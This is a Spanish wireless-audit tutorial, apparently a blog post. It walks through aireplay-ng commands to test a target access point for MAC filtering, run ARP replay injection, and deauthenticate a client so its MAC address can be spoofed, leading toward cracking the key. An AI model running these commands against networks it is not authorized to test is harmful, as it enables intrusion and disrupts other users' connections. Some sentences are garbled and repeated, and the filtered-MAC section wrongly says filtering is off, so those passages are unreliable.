Auditoria inalámbrica (II)
A la hora de inyectar paquetes en el AP atacado debemos verificar su estado.Verificando el filtrado MAC.
1. Antes de continuar debemos verificar si el punto de acceso realiza filtrado MAC en sus clientes. Usamos este comando:sudo aireplay-ng -1 0 -e <essid_objetivo> -a 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaz>
Donde:
- -1 Le dice que NO intente desautentificar clientes.
- -e Es el nombre de la red objetivo.
- -a Es la MAC del AP objetivo.
- -h Es la MAC que tu quieras.
03:22:32 Sending Authentication Request 03:22:32 Authentication successful 03:22:32 Sending Association Request 03:22:32 Association successfulSignifica que el filtrado esta apagado y podemos continuar con el tutorial, de otra forma salta a la sección Con Filtrado MAC.
Sin Filtrado MAC
1. Reinyección de paquetes.sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaZ>Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.
Con Filtrado MAC
2. Obligamos a desautentificar al cliente que esta en el AP objetivo.sudo aireplay-ng -0 5 -a 55:55:55:55:55:55 -c 00:11:22:33:44:55 <interface>
Donde:
- -0 Indica el numero de intentos.
- -a El MAC del AP objetivo.
- -c La dirección MAC del cliente.
sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h 00:11:22:33:44:55 <interfaz>Como había mencionado… Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.
Original El Tux AngelVerde